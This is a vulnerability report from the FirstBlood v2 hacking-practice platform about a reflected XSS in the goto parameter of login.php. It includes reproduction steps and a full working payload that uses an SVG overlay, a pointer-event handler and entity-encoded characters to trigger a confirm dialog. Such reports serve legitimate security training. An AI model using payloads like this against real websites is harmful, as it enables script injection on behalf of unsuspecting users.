FirstBlood-#308 — Reflective XSS on login.php via goto parameter
This issue was discovered on FirstBlood v2
On 2021-10-25, panya Level 7 reported:
The goto
parameter still vulnerable to reflective XSS.
Steps to reproduce:
- Open https://579a3c7897af-panya.a.firstbloodhackers.com/login.php?goto=%22%3E%3Csvg/style=%22position:fixed;top:0;left:0;width:100%;height:100%;z-index:100%22/onpointerrawupdate=%22%0aconfirm%26lpar;origin%26rpar;%22%3E
- Move the mouse to any point of the site.
Actual result:
There will be an alert with the text "https://579a3c7897af-panya.a.firstbloodhackers.com"
Expected result:
The goto
parameter value should be properly escaped or sanitized. The alert should not be shown.
Impact:
XSS on behalf of a user of this site.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: "><svg/style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:100"/onpointerrawupdate="%0aconfirm%26lpar;origin%26rpar;">
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (
ID 39
), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.